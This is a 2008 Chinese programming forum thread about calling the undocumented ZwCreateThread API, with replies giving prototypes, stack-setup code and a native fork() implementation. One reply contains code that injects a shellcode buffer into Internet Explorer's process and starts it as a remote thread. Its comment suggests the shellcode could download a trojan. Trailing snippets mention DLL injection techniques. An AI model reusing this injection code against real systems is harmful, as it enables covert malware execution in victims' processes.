200分求一个函数的用法--ZwCreateThread

Kerrie 2008-12-11 04:45:58
问题很简单,就是如何用ZwCreateThread创建一个线程,线程函数带一个参数,如
UINT ThreadProc(LPVOID lpVoid)
{
C*** pThis = (C***)lpVoid;

MessageBox(NULL, "F**K ZwCreateThread", NULL, MB_OK);
return 0;
}

见鬼的m$,一大堆破参数怎么也写也不对,调用结果一律100%CPU资源占用死锁
...全文
1272 20 打赏 收藏 转发到动态 举报
写回复
用AI写文章
20 条回复
切换为时间正序
请发表友善的回复…
发表回复
tttbot 2010-01-28
  • 打赏
  • 举报
 回复
我成功调用了,开始我也是那样的CPU占100%,后来跟踪调试发现,是线程的返回问题,我在线程代码里加了一个ExitThread()函数,问题解决!当然也可以使用TerminateThread()函数,只要线程能正常返回就可以了
scq2099yt 2008-12-12
  • 打赏
  • 举报
 回复
NTSYSAPI
NTSTATUS
NTAPI
NtCreateThread(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
OUT PCLIENT_ID ClientId,
IN PCONTEXT ThreadContext,
IN PINITIAL_TEB InitialTeb,
IN BOOLEAN CreateSuspended );
roadblossom 2008-12-12
  • 打赏
  • 举报
 回复
study!
yaozhu88 2008-12-12
  • 打赏
  • 举报
 回复
模访NTDLL.DLL里面怎么做的行不?最后用先传服务号,准备堆栈。再INT 0X2E中断
cnzdgs 2008-12-11
  • 打赏
  • 举报
 回复
参数可以通过寄存器或者栈来传递,如果线程函数使用__cdecl或__stdcall约定,则用栈来传递,线程函数最后调用ZwTerminateThread退出。
Kerrie 2008-12-11
  • 打赏
  • 举报
 回复
to KeSummer & wmpkumse:感谢两位的回复,不过还是没有看到参数的处理。

另外,楼上几位的代码原理都一样,eax值为空的话,线程主函数退出后,程序会挂掉。有谁成功的调用过ZwCreateThread?
wmpkumse 2008-12-11
  • 打赏
  • 举报
 回复 
unsigned char shellcode[1024*4]={...}//一个ring3的shellcode,可以想象一下~~比如从url下载木马的...

HANDLE CreateUserThread(

           IN HANDLE hProcess,

           IN PVOID EntryPoint,

           IN ULONG RegEax,

           IN ULONG RegEbx

           )

{

   USER_STACK stack = {0};

   CONTEXT context;

   NTSTATUS status;

   ULONG AllocSize = PAGE_SIZE * 2;

   PVOID p;

   ULONG OldProtect;

   HANDLE hThread = (HANDLE)0;

   PCLIENT_ID cid;



   status = ZwAllocateVirtualMemory(hProcess,

                          &stack.ExpandableStackBottom,

                                    0,

                                    &AllocSize,

                                    MEM_RESERVE,

                                    PAGE_READWRITE);



   if (NT_SUCCESS(status))

   {

       stack.ExpandableStackBase = (PUCHAR)stack.ExpandableStackBottom + PAGE_SIZE;

       stack.ExpandableStackLimit = stack.ExpandableStackBase;



       AllocSize = PAGE_SIZE;

       p = (PCHAR)stack.ExpandableStackBase - AllocSize;



       status = ZwAllocateVirtualMemory(hProcess, 

                              &p, 

                                        0, 

                                        &AllocSize, 

                                        MEM_COMMIT, 

                                        PAGE_READWRITE);



       if (NT_SUCCESS(status))

       {

           AllocSize = PAGE_SIZE;



           status = ZwProtectVirtualMemory(hProcess, 

                                  &p, 

                                           &AllocSize, 

                                           PAGE_READWRITE | PAGE_GUARD, 

                                           &OldProtect);



           if (NT_SUCCESS(status))

           {

               cid = ExAllocatePool(PagedPool, sizeof(CLIENT_ID));



               context.ContextFlags = CONTEXT_FULL;



               context.SegCs = 0x18;

               context.SegFs = 0x38;

               context.SegEs = 0x20;

               context.SegDs = 0x20;

               context.SegSs = 0x20; 

               context.SegGs = 0x00;

               context.EFlags = 0x3000;



               context.Esp = (ULONG)stack.ExpandableStackBase - 4;

               context.Eip = (ULONG)EntryPoint; 

               context.Eax = RegEax;

               context.Ebx = RegEbx;



               status = ZwCreateThread(&hThread, 

                                  THREAD_ALL_ACCESS, 

                                       NULL, 

                                       hProcess, 

                                       cid, 

                                       &context, 

                                       &stack, 

                                       FALSE);



               ExFreePool(cid);



               

               if (NT_SUCCESS(status)) return hThread;

           }



           AllocSize = 0;



           ZwFreeVirtualMemory(hProcess, 

                          &p, 

                               &AllocSize, 

                               MEM_RELEASE);

       }



       AllocSize = PAGE_SIZE * 2;



       ZwFreeVirtualMemory(hProcess, 

                      &stack.ExpandableStackBottom, 

                           &AllocSize, 

                           MEM_DECOMMIT);

       return NULL;

}

HANDLE WriteShellToProcess()

{

HANDLE hProcess;

DWORD pid;

CLIENT_ID ClientId;

NTSTATUS stat;

OBJECT_ATTRIBUTES       obj;

PVOID EntryPoint=0;

ULONG AllocSize = PAGE_SIZE * 10;

getprocessptr(0,L"iexplorer.exe",&pid);

ClientId.UniqueProcess = (HANDLE)pid;

ClientId.UniqueThread = 0;

InitializeObjectAttributes(&obj, 

                      NULL,

                    OBJ_CASE_INSENSITIVE,

                    NULL, 

                              NULL);

stat = ZwOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&obj,&ClientId);

if(NT_SUCCESS(stat))

{

       stat = ZwAllocateVirtualMemory(hProcess,

                          &EntryPoint,

                                    0,

                                    &AllocSize,

                                    MEM_COMMIT,

                                    PAGE_EXECUTE_READWRITE);

       if(NT_SUCCESS(stat))

       {

           stat = ZwWriteVirtualMemory(hProcess, EntryPoint, shellcode, sizeof(shellcode), 0);

           if(NT_SUCCESS(stat))

           {

               return CreateUserThread(hProcess,EntryPoint,0,0);

           }

       }

}

return NULL;



}
KeSummer 2008-12-11
  • 打赏
  • 举报
 回复
看Windows NT 2000 Native API Reference这本书所附带的代码
或者wrk或者react os的代码



#include "ntdll.h"

#include <stdio.h>



namespace NT {

    extern "C" {



NTSTATUS

NTAPI

CsrClientCallServer(

    IN PVOID Message,

    IN PVOID,

    IN ULONG Opcode,

    IN ULONG Size

    );



    }

}



VOID InheritAll()

{

    ULONG n = 0x1000;

    PULONG p = new ULONG[n];



    while (NT::ZwQuerySystemInformation(NT::SystemHandleInformation, p, n * sizeof *p, 0)

           == STATUS_INFO_LENGTH_MISMATCH)

        delete [] p, p = new ULONG[n *= 2];



    NT::PSYSTEM_HANDLE_INFORMATION h = NT::PSYSTEM_HANDLE_INFORMATION(p + 1);



    ULONG pid = GetCurrentProcessId();



    for (ULONG i = 0; i < *p; i++)

        if (h[i].ProcessId == pid)

            SetHandleInformation(HANDLE(h[i].Handle), HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT);

    delete [] p;

}



VOID InformCsrss(HANDLE hProcess, HANDLE hThread, ULONG pid, ULONG tid)

{

    struct CSRSS_MESSAGE {

        ULONG Unknown1;

        ULONG Opcode;

        ULONG Status;

        ULONG Unknown2;

    };



    struct {

        NT::PORT_MESSAGE PortMessage;

        CSRSS_MESSAGE CsrssMessage;

        PROCESS_INFORMATION ProcessInformation;

        NT::CLIENT_ID Debugger;

        ULONG CreationFlags;

        ULONG VdmInfo[2];

    } csrmsg = {{0}, {0}, {hProcess, hThread, pid, tid}, {0}, 0, {0}};



    NT::CsrClientCallServer(&csrmsg, 0, 0x10000, 0x24);

}



__declspec(naked) int child()

{

    typedef BOOL (WINAPI *CsrpConnectToServer)(PWSTR);



    // CsrpConnectToServer(0x77F68CC0)(L"\\Windows");

    // CsrpConnectToServer(0x77F8F65D)(L"\\Windows");

    CsrpConnectToServer(0x77F922F5)(L"\\Windows");



    __asm mov   eax, 0

    __asm mov   esp, ebp

    __asm pop   ebp

    __asm ret

}





#pragma optimize("y", off)  // disable frame pointer omission



int fork()

{

    HANDLE hProcess, hThread;



    InheritAll();



    NT::OBJECT_ATTRIBUTES oa = {sizeof oa};



    NT::ZwCreateProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, NtCurrentProcess(), TRUE, 0, 0, 0);



    NT::CONTEXT context = {CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS | CONTEXT_FLOATING_POINT};



    NT::ZwGetContextThread(NtCurrentThread(), &context);



    context.Eip = ULONG(child);



    MEMORY_BASIC_INFORMATION mbi;



    NT::ZwQueryVirtualMemory(NtCurrentProcess(), PVOID(context.Esp),

                             NT::MemoryBasicInformation, &mbi, sizeof mbi, 0);



    NT::USER_STACK stack = {0, 0, PCHAR(mbi.BaseAddress) + mbi.RegionSize,

                            mbi.BaseAddress, mbi.AllocationBase};



    NT::CLIENT_ID cid;



    NT::ZwCreateThread(&hThread, THREAD_ALL_ACCESS, &oa,

                       hProcess, &cid, &context, &stack, TRUE);



    NT::THREAD_BASIC_INFORMATION tbi;



    NT::ZwQueryInformationThread(NtCurrentThread(), NT::ThreadBasicInformation,

                                 &tbi, sizeof tbi, 0);



    NT::PNT_TIB tib = tbi.TebBaseAddress;



    NT::ZwQueryInformationThread(hThread, NT::ThreadBasicInformation, &tbi, sizeof tbi, 0);



    NT::ZwWriteVirtualMemory(hProcess, tbi.TebBaseAddress,

                             &tib->ExceptionList, sizeof tib->ExceptionList, 0);



    InformCsrss(hProcess, hThread, ULONG(cid.UniqueProcess), ULONG(cid.UniqueThread));



    NT::ZwResumeThread(hThread, 0);



    NT::ZwClose(hThread);

    NT::ZwClose(hProcess);



    return int(cid.UniqueProcess);

}



#pragma optimize("", on)





int main()

{

    int n = fork();

    Sleep(n * 10);

    Beep(100, 100);

    printf("%d\n", n);

    return 0;

}
Kerrie 2008-12-11
  • 打赏
  • 举报
 回复
to jingzhongrong : 参数如何传递?
jingzhongrong 2008-12-11
  • 打赏
  • 举报
 回复 
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,0,dwpid);//dwpid就是某些个系统进程ID



USER_STACK stack = {0};



DWORD ret;

ULONG n = 1024*1024;//1MB

ret=ZwAllocateVirtualMemory(hProcess, &stack.ExpandableStackBottom, 0, &n,MEM_RESERVE, PAGE_READWRITE);



stack.ExpandableStackBase = PCHAR(stack.ExpandableStackBottom) +1024*1024;

stack.ExpandableStackLimit = PCHAR(stack.ExpandableStackBase) - 4096;

n = 4096 + PAGE_SIZE;



PVOID p = PCHAR(stack.ExpandableStackBase) - n;

ret=ZwAllocateVirtualMemory(hProcess, &p, 0, &n, MEM_COMMIT, PAGE_READWRITE);



ULONG x; n = PAGE_SIZE;

ret=ZwProtectVirtualMemory(hProcess, &p, &n, PAGE_READWRITE | PAGE_GUARD, &x);



CONTEXT context = {CONTEXT_FULL};



ret=ZwGetContextThread(GetCurrentThread(),&context);



context.Esp = ULONG(stack.ExpandableStackBase) - 2048;

context.Eip = ULONG(startaddress);



CLIENT_ID cid;



ret=ZwCreateThread(&hThread, THREAD_ALL_ACCESS, 0, hProcess, &cid, &context, &stack, TRUE);

if(ret) MessageBox(0,"ZwCreateThread","",0);
ivan_08 2008-12-11
  • 打赏
  • 举报
 回复
不会,帮顶
Kerrie 2008-12-11
  • 打赏
  • 举报
 回复
to oyljerry: BaseCreateStack是哪里定义的,我的ddk版本不够?
oyljerry 2008-12-11
  • 打赏
  • 举报
 回复
HANDLE APIENTRY CreateRemoteThread(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, DWORD dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
{
NTSTATUS Status;
OBJECT_ATTRIBUTES Obja;
POBJECT_ATTRIBUTES pObja;
HANDLE Handle;
CONTEXT ThreadContext;
INITIAL_TEB InitialTeb;
CLIENT_ID ClientId;

// Allocate a stack for this thread
Status = BaseCreateStack(hProcess, dwStackSize, 0L, &InitialTeb );

// Create an initial context
BaseInitializeContext( &ThreadContext, lpParameter, (PVOID)lpStartAddress, InitialTeb.StackBase, BaseContextTypeThread);

pObja = BaseFormatObjectAttributes(&Obja, lpThreadAttributes, NULL);

Status = NtCreateThread( &Handle, THREAD_ALL_ACCESS, pObja, hProcess, &ClientId, &ThreadContext, &InitialTeb, TRUE );
oyljerry 2008-12-11
  • 打赏
  • 举报
 回复
NTSYSAPI
NTSTATUS
NTAPI
NtCreateThread(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
OUT PCLIENT_ID ClientId,
IN PCONTEXT ThreadContext,
IN PINITIAL_TEB InitialTeb,
IN BOOLEAN CreateSuspended );
cnzdgs 2008-12-11
  • 打赏
  • 举报
 回复
用ZwCreateThread是很麻烦的,为何不用CreateThread?
康斯坦汀 2008-12-11
  • 打赏
  • 举报
 回复
http://www.codeproject.com/KB/threads/cthread.aspx

Kerrie 2008-12-11
  • 打赏
  • 举报
 回复
AfxBeginThread/CreateThread/_beginThread由于项目自身原因无法使用,只能采用ZwCreateThread/NtCreateThread
康斯坦汀 2008-12-11
  • 打赏
  • 举报
 回复
用CThread类,我一直用,简单、好用。
oyljerry 2008-12-11
  • 打赏
  • 举报
 回复
ZwCreateThread是底层内核API实现
你创建线程,可以用_beginthreadex,AfxBeginThread等来创建..
xiang_yun 2008-12-11
  • 打赏
  • 举报
 回复
楼主的ZwCreateThread在MSDN里面都找不到
如果是创建线程,有Windows API AfxBeginThread


UINT MyThreadProc( LPVOID pParam )

{

    CMyObject* pObject = (CMyObject*)pParam;



    if (pObject == NULL ||

        !pObject->IsKindOf(RUNTIME_CLASS(CMyObject)))

    return 1;   // if pObject is not valid



    // do something with 'pObject'



    return 0;   // thread completed successfully

}



// inside a different function in the program

.

.

.

pNewObject = new CMyObject;

AfxBeginThread(MyThreadProc, pNewObject);

.

.

.
驱动开发:内核远程线程实现DLL注入
在笔者上一篇文章`《驱动开发:内核RIP劫持实现DLL注入》`介绍了通过劫持RIP指针控制程序执行流实现插入DLL的目的,本章将继续探索全新的注入方式,通过`NtCreateThreadEx`这个内核函数实现注入DLL的目的,需要注意的是该函数在微软系统中未被导出使用时需要首先得到该函数的入口地址,`NtCreateThreadEx`函数最终会调用`ZwCreateThread`,本章在寻找函数的方式上有所不同,前一章通过内存定位的方法得到所需地址,本章则是通过解析导出表实现。
Inject集合----远程线程注入(RtlCreateUserThread
之前我写过关于用CreateRemoteThread和NtCreateThreadEx 进行DLL注入,但是我想起之前还有一个函数可以实现远程线程注入,那就是今天的主角RtlCreateUserThread,它和NtCreateThreadEx 一样,也是一个未公开的函数,但是它和CreateRemoteThread和NtCreateThreadEx使用方法是一样的,并没有什么升级的操作。 我在网上看到说,RtlCreateUserThread其实是对NtCreateThreadEx的包装。 ...
虚拟机技术研究
虚拟机技术研究 1. 背景 虚拟机技术是在一个物理主机上创建一个或多个可执行环境的技术。每个虚拟机代表了一个潜在的物理主机的实例,并且互不干扰。这种隔离的属性使虚拟机可以成为安全系统和错误容忍应用程序的基石。 我们将介绍一个基于Windows的操作系统层虚拟机体系结构,我们称其为AVM。AVM虚拟机的主要思想是命名空间虚拟化(Namespace Virtualization),即在系统调用接
转帖 SSDT HOOK拦截远线程的创建(下)

第三部分:从进程句柄获取信息
      在第二部分我们使用了一个前提:可以通过进程句柄得到PID等信息。
      事实上这是可行的,这一部分我们就进行介绍。我这里使用的是炉子大虾的《API HOOK实现ring3的进程保护》一文中提到的方法。
      炉子那篇文章里讲的很详细,这里只说下如何从进程句柄中获取信息吧,在NTDLL中有个函数可以帮助我们:Zw(Nt)QueryInformationProcess,下面是我在《The Undocumented F
2021-09-18
测 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档前言一、常见的dll注入技术二、使用步骤1.全局钩子注入2.远程线程注入3.突破Session 0隔离的远程线程注入(利用ZwCreateThreadEx函数)4.APC注入总结 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 注入技术前言一、常见的dll注入技术二、使用步骤1.全局钩子注入2.远程线程注入3.突破Session 0隔离的远程线程注入(利用ZwCreateThreadEx函数)4.APC注入总结 前言
进程/线程/DLL

15,471

社区成员

49,182

社区内容

发帖
与我相关
我的任务
社区描述
VC/MFC 进程/线程/DLL
社区管理员
  • 进程/线程/DLL社区
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章